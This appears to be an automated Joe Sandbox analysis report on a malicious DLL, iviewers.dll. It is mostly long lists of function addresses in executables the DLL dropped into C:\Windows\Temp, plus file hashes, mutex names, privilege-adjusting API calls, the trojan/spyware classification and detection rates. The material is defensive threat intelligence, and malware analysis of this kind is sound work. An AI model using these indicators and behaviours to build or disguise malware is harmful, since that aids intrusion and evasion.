Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218B6A68	26_2_00007FF6218B6A68
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621840A80	26_2_00007FF621840A80
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62186BAB0	26_2_00007FF62186BAB0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621885AB0	26_2_00007FF621885AB0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621843A30	26_2_00007FF621843A30
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621867CEB	26_2_00007FF621867CEB
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A0D14	26_2_00007FF6218A0D14
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218C5C50	26_2_00007FF6218C5C50
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218C6C30	26_2_00007FF6218C6C30
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218BBB90	26_2_00007FF6218BBB90
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621885EF0	26_2_00007FF621885EF0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621847E70	26_2_00007FF621847E70
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621890E90	26_2_00007FF621890E90
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621840E80	26_2_00007FF621840E80
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62186BDD0	26_2_00007FF62186BDD0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62184ADD0	26_2_00007FF62184ADD0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218C4E30	26_2_00007FF6218C4E30
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A8D50	26_2_00007FF6218A8D50
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621884D40	26_2_00007FF621884D40
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621815DB0	26_2_00007FF621815DB0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218B30B8	26_2_00007FF6218B30B8
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62186C0F0	26_2_00007FF62186C0F0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218AF0D8	26_2_00007FF6218AF0D8
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218170E0	26_2_00007FF6218170E0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218BC128	26_2_00007FF6218BC128
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218C5070	26_2_00007FF6218C5070
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218CFFBC	26_2_00007FF6218CFFBC
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62184BF40	26_2_00007FF62184BF40
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741ABF020	27_2_00007FF741ABF020
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AB02C0	27_2_00007FF741AB02C0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A9BAB0	27_2_00007FF741A9BAB0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A85310	27_2_00007FF741A85310
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A91AF0	27_2_00007FF741A91AF0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A73A30	27_2_00007FF741A73A30
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A70A80	27_2_00007FF741A70A80
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741ADA924	27_2_00007FF741ADA924
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A46180	27_2_00007FF741A46180
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AA5970	27_2_00007FF741AA5970
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AD6164	27_2_00007FF741AD6164
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A7ECB0	27_2_00007FF741A7ECB0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A72CA0	27_2_00007FF741A72CA0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A66510	27_2_00007FF741A66510
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A97CEB	27_2_00007FF741A97CEB
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A70450	27_2_00007FF741A70450
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A9C420	27_2_00007FF741A9C420
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A9B480	27_2_00007FF741A9B480
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A683D0	27_2_00007FF741A683D0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AC73F0	27_2_00007FF741AC73F0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A693F0	27_2_00007FF741A693F0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AA6350	27_2_00007FF741AA6350
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AD5394	27_2_00007FF741AD5394
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AEBB90	27_2_00007FF741AEBB90
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A71B90	27_2_00007FF741A71B90
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A74B70	27_2_00007FF741A74B70
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A6FE20	27_2_00007FF741A6FE20
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A70E80	27_2_00007FF741A70E80
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AD666C	27_2_00007FF741AD666C
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A77E70	27_2_00007FF741A77E70
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741B00658	27_2_00007FF741B00658
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A9BDD0	27_2_00007FF741A9BDD0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AFB5B0	27_2_00007FF741AFB5B0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A45DB0	27_2_00007FF741A45DB0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A76DB0	27_2_00007FF741A76DB0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AD5598	27_2_00007FF741AD5598
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A46610	27_2_00007FF741A46610
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AD8D50	27_2_00007FF741AD8D50
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A65520	27_2_00007FF741A65520
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A7D570	27_2_00007FF741A7D570
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A798CD	27_2_00007FF741A798CD
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741ACE0C0	27_2_00007FF741ACE0C0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A720B0	27_2_00007FF741A720B0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A9C0F0	27_2_00007FF741A9C0F0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A470E0	27_2_00007FF741A470E0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AAD080	27_2_00007FF741AAD080
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AFFFBC	27_2_00007FF741AFFFBC
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AD579C	27_2_00007FF741AD579C
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AA2750	27_2_00007FF741AA2750
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A6F730	27_2_00007FF741A6F730
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A94720	27_2_00007FF741A94720
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A9B780	27_2_00007FF741A9B780
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A89F80	27_2_00007FF741A89F80
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEDF020	28_2_00007FF7CEEDF020
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEF579C	28_2_00007FF7CEEF579C
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEBB780	28_2_00007FF7CEEBB780
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEA9F80	28_2_00007FF7CEEA9F80
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEC2750	28_2_00007FF7CEEC2750
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE8F730	28_2_00007FF7CEE8F730
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEB4720	28_2_00007FF7CEEB4720
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEBC0F0	28_2_00007FF7CEEBC0F0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE670E0	28_2_00007FF7CEE670E0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE998CD	28_2_00007FF7CEE998CD
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEEE0C0	28_2_00007FF7CEEEE0C0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE920B0	28_2_00007FF7CEE920B0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEECD080	28_2_00007FF7CEECD080
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEF1FFBC	28_2_00007FF7CEF1FFBC
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE66610	28_2_00007FF7CEE66610
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEF20658	28_2_00007FF7CEF20658
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEBBDD0	28_2_00007FF7CEEBBDD0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE96DB0	28_2_00007FF7CEE96DB0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE65DB0	28_2_00007FF7CEE65DB0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEF5598	28_2_00007FF7CEEF5598
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE9D570	28_2_00007FF7CEE9D570
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEF8D50	28_2_00007FF7CEEF8D50
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE85520	28_2_00007FF7CEE85520
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE90E80	28_2_00007FF7CEE90E80
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEF1B5B0	28_2_00007FF7CEF1B5B0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE97E70	28_2_00007FF7CEE97E70
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEF666C	28_2_00007FF7CEEF666C
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE8FE20	28_2_00007FF7CEE8FE20
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE893F0	28_2_00007FF7CEE893F0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEE73F0	28_2_00007FF7CEEE73F0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE883D0	28_2_00007FF7CEE883D0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE91B90	28_2_00007FF7CEE91B90
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEF5394	28_2_00007FF7CEEF5394
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE94B70	28_2_00007FF7CEE94B70
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEC6350	28_2_00007FF7CEEC6350
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE86510	28_2_00007FF7CEE86510
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEB7CEB	28_2_00007FF7CEEB7CEB
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE9ECB0	28_2_00007FF7CEE9ECB0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE92CA0	28_2_00007FF7CEE92CA0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEF0BB90	28_2_00007FF7CEF0BB90
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEBB480	28_2_00007FF7CEEBB480
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE90450	28_2_00007FF7CEE90450
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEBC420	28_2_00007FF7CEEBC420
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE66180	28_2_00007FF7CEE66180
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEC5970	28_2_00007FF7CEEC5970
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEF6164	28_2_00007FF7CEEF6164
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEFA924	28_2_00007FF7CEEFA924
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEA5310	28_2_00007FF7CEEA5310
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEB1AF0	28_2_00007FF7CEEB1AF0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEED02C0	28_2_00007FF7CEED02C0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEBBAB0	28_2_00007FF7CEEBBAB0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE90A80	28_2_00007FF7CEE90A80
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE93A30	28_2_00007FF7CEE93A30
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A9F020	29_2_00007FF786A9F020
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786ADFFBC	29_2_00007FF786ADFFBC
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AB579C	29_2_00007FF786AB579C
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A82750	29_2_00007FF786A82750
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A4F730	29_2_00007FF786A4F730
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A74720	29_2_00007FF786A74720
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A7B780	29_2_00007FF786A7B780
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A69F80	29_2_00007FF786A69F80
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A598CD	29_2_00007FF786A598CD
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AAE0C0	29_2_00007FF786AAE0C0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A520B0	29_2_00007FF786A520B0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A7C0F0	29_2_00007FF786A7C0F0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A270E0	29_2_00007FF786A270E0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A8D080	29_2_00007FF786A8D080
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A7BDD0	29_2_00007FF786A7BDD0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786ADB5B0	29_2_00007FF786ADB5B0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A25DB0	29_2_00007FF786A25DB0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A56DB0	29_2_00007FF786A56DB0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AB5598	29_2_00007FF786AB5598
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A26610	29_2_00007FF786A26610
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AB8D50	29_2_00007FF786AB8D50
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A45520	29_2_00007FF786A45520
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A5D570	29_2_00007FF786A5D570
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A4FE20	29_2_00007FF786A4FE20
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A50E80	29_2_00007FF786A50E80
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A57E70	29_2_00007FF786A57E70
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AB666C	29_2_00007FF786AB666C
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AE0658	29_2_00007FF786AE0658
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A483D0	29_2_00007FF786A483D0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AA73F0	29_2_00007FF786AA73F0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A493F0	29_2_00007FF786A493F0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A86350	29_2_00007FF786A86350
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786ACBB90	29_2_00007FF786ACBB90
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AB5394	29_2_00007FF786AB5394
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A51B90	29_2_00007FF786A51B90
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A54B70	29_2_00007FF786A54B70
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A5ECB0	29_2_00007FF786A5ECB0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A52CA0	29_2_00007FF786A52CA0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A46510	29_2_00007FF786A46510
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A77CEB	29_2_00007FF786A77CEB
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A50450	29_2_00007FF786A50450
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A7C420	29_2_00007FF786A7C420
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A7B480	29_2_00007FF786A7B480
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786ABA924	29_2_00007FF786ABA924
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A26180	29_2_00007FF786A26180
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A85970	29_2_00007FF786A85970
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AB6164	29_2_00007FF786AB6164
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A902C0	29_2_00007FF786A902C0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A7BAB0	29_2_00007FF786A7BAB0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A65310	29_2_00007FF786A65310
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A71AF0	29_2_00007FF786A71AF0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A53A30	29_2_00007FF786A53A30
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A50A80	29_2_00007FF786A50A80

Source: Joe Sandbox View	Dropped File: C:\Windows\Temp\5mg21dmq.1jt.exe 1420F60F053C3EA5605239EE431E5F487245108B1C01BE75D16B5246156FA178
Source: Joe Sandbox View	Dropped File: C:\Windows\Temp\inyligbs.qlq.exe 1420F60F053C3EA5605239EE431E5F487245108B1C01BE75D16B5246156FA178
Source: Joe Sandbox View	Dropped File: C:\Windows\Temp\ochicikt.z2z.exe 1420F60F053C3EA5605239EE431E5F487245108B1C01BE75D16B5246156FA178

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: String function: 00007FF621846940 appears 41 times
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: String function: 00007FF62183E1D0 appears 33 times
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: String function: 00007FF6218586B0 appears 54 times
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: String function: 00007FF6218A8254 appears 34 times
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: String function: 00007FF62183BA80 appears 32 times
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: String function: 00007FF741A76940 appears 41 times
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: String function: 00007FF741A6E1D0 appears 33 times
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: String function: 00007FF741A6BA80 appears 32 times
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: String function: 00007FF741A886B0 appears 70 times
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: String function: 00007FF741AD8254 appears 33 times
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: String function: 00007FF786AB8254 appears 33 times
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: String function: 00007FF786A56940 appears 41 times
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: String function: 00007FF786A4BA80 appears 32 times
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: String function: 00007FF786A4E1D0 appears 33 times
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: String function: 00007FF786A686B0 appears 70 times
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: String function: 00007FF7CEEA86B0 appears 70 times
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: String function: 00007FF7CEEF8254 appears 33 times
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: String function: 00007FF7CEE8BA80 appears 32 times
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: String function: 00007FF7CEE96940 appears 41 times
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: String function: 00007FF7CEE8E1D0 appears 33 times

Source: iviewers.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: classification engine

Classification label: mal100.troj.spyw.evad.winDLL@43/32@1/3

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF62189B9B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,

26_2_00007FF62189B9B0

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF62184E610 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

26_2_00007FF62184E610

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF621884EC7 CoCreateInstance,

26_2_00007FF621884EC7

Source: C:\Windows\System32\loaddll32.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\loaddll32.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Mutant created: \Sessions\1\BaseNamedObjects\Mmm-A33C734061CA11EE8C18806E6F6E696370AE6C04
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vl4ovfe.2gf.ps1

Jump to behavior

Source: iviewers.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: iviewers.dll

Static file information: TRID: Win32 Dynamic Link Library (generic) Net Framework (1011504/3) 44.80%

Source: C:\Windows\System32\loaddll32.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer

Source: iviewers.dll	Virustotal: Detection: 34%
Source: iviewers.dll	ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\iviewers.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
